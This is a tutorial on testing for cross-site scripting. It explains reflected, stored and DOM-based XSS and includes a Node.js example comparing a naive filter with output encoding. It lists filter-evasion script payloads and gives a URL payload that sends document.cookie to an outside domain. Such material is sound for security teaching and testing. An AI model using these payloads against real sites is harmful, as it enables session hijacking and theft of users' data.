Security Testing - Cross-Site Scripting Attack (xss)

  
Cross-site scripting (XSS) is a common and important web security vulnerability. It occurs when an attacker supplies input containing script or markup and the program neither validates the input nor encodes it on output, so the input is rendered as part of the page and the victim's browser executes it under the attacker's control. The attacker can then read the user's cookies and collect system and browser information; a stored XSS can also be used for phishing to obtain more user information.

The most common test for cross-site scripting is to submit <script>alert(1)</script> and its variants, each of which is designed to get past a simple filter:

  <Script>alert(1)</script>   (mixed case)
  %3Cscript%3Ealert(1)%3C/script%3E   (URL encoded)
  <scr<script>ipt>alert(1)<scr<script>ipt>   (nested tag; survives a filter that strips "<script>" once)
  <script x=1>alert(1)</script x=1>   (extra attribute)
  <script>confirm(1)</script>   (a different function, in case "alert" is blocked)
  javascript:alert(1)   (in a URL attribute such as href or src)

If a dialog box pops up after the submission, the page has an XSS vulnerability.

* Reflected XSS. Put simply, the code you enter takes effect as code instead of the page showing what the original program intended. Take the following page as an example:

  <html><body><script>document.write(location.search);</script></body></html>

location.search returns the part of the URL from the "?" onward. Opening http://127.0.0.1/attrck.html?search=222 makes the page display ?search=222. But opening /attrck.html?search=<script>alert(1)</script> means the page effectively runs document.write("?search=<script>alert(1)</script>"): a dialog box pops up, i.e. the code <script>alert(1)</script> is executed instead of the page displaying the query string as text. (Browsers that follow the current URL standard percent-encode "<" and ">" in location.search, so this exact page only fires if it decodes the value, for example with decodeURIComponent, before writing it; the pattern is otherwise the same.)
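The following is an added example, not code from the original article. It models the document.write(location.search) sink above as a plain string-building function so it runs under Node.js without a browser, then pushes the payload variants listed above through three renderers: the vulnerable sink, a naive blacklist filter that strips the literal "<script>" tag, and HTML entity encoding. The payload list, the renderers and the decodeParam helper are all constructed for this example; it assumes the page (or the server behind it) URL-decodes the parameter before the value reaches the sink.

```javascript
// Added example (not from the original article): compare a naive "<script>"
// blacklist with HTML entity encoding against the article's payload variants.

// Payload variants from the article, gathered here as a constructed test set.
const PAYLOADS = [
  '<Script>alert(1)</script>',                 // mixed case
  '%3Cscript%3Ealert(1)%3C/script%3E',        // URL encoded
  '<scr<script>ipt>alert(1)<scr<script>ipt>', // nested tag
  '<script x=1>alert(1)</script x=1>',        // extra attribute
  '<script>confirm(1)</script>',              // different function
];

// The query value as the page sees it after URL decoding. This assumes the
// page or server decodes the parameter; location.search itself is left
// percent-encoded by modern browsers.
function decodeParam(raw) {
  return decodeURIComponent(raw);
}

// Vulnerable sink: the value reaches document.write() untouched.
function renderVulnerable(value) {
  return '?search=' + value;
}

// Naive blacklist: remove the literal tag "<script>" (case-insensitive).
// The nested-tag and extra-attribute variants are built to defeat exactly this.
function naiveFilter(value) {
  return '?search=' + value.replace(/<script>/gi, '');
}

// Output encoding: turn every HTML-significant character into an entity so
// the browser can only treat the value as text, never as markup.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}
function renderEncoded(value) {
  return '?search=' + htmlEncode(value);
}

// A script element survives into the output if an opening "<script" tag is
// still present. A regex is not an HTML parser: it is enough for these
// payloads but would not be a safe general-purpose detector.
function scriptSurvives(html) {
  return /<script\b/i.test(html);
}

// Run every payload through a renderer and report which ones still carry a
// live script tag.
function evaluate(render) {
  return PAYLOADS.map((raw) => {
    const output = render(decodeParam(raw));
    return { payload: raw, output, executes: scriptSurvives(output) };
  });
}

const renderers = [
  ['vulnerable sink', renderVulnerable],
  ['naive filter', naiveFilter],
  ['entity encoded', renderEncoded],
];
for (const [name, render] of renderers) {
  const hits = evaluate(render).filter((r) => r.executes).length;
  console.log(`${name}: ${hits} of ${PAYLOADS.length} payloads still execute`);
}
```

Run it with node: the naive filter stops the mixed-case, URL-encoded and confirm() variants but lets the nested-tag and extra-attribute ones through, while entity encoding stops all five. The same logic applies to innerHTML and document.writeln sinks; the real fix is to encode on output for the context the value lands in (or to use a text-only sink such as textContent), not to enumerate bad strings.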
A forged URL can be used to steal the user's cookie. For example, add document.cookie = "name=123"; to the page from example 1 so that a cookie is set, then construct the following URL to carry the cookie of the 127.0.0.1 site out through the search parameter:

  http://127.0.0.1/attrck.html?search=<script>window.open("http://www.baidu.com/s?wd="+document.cookie)</script>

Browsers forbid cross-domain access to cookies, but the injected script runs inside the page at 127.0.0.1, so the browser treats it as that site's own code and document.cookie returns that site's cookies; the script then leaks them in the URL of a request to another domain. Note that cookies set with the HttpOnly flag are not visible to document.cookie, so a script payload can only read cookies that lack it.

* Stored XSS means saving the malicious code on the server, for example by posting it as content; other users then execute the malicious script when they browse the page.

* DOM-based XSS. Strictly speaking this is also reflected, and the example in this article is DOM-based as well. It refers to attacks that modify the page's DOM through client-side methods such as document.write, document.writeln or innerHTML, where attacker-controlled input reaches one of these sinks without being encoded.

Finding XSS vulnerabilities is generally done with manual input. You need to take into account input restrictions, filtering, length limits and other factors, so a range of varied inputs must be designed to get results. Tools can also be used: for example, Burp Suite can capture a request so that you can modify its parameters by hand and resubmit it to the browser for testing, because XSS is not limited to the visible inputs on a page; hidden form fields, GET request parameters and so on may also be injectable.

This article comes from [System Home] www.xp85.com
Copyright © Windows knowledge All Rights Reserved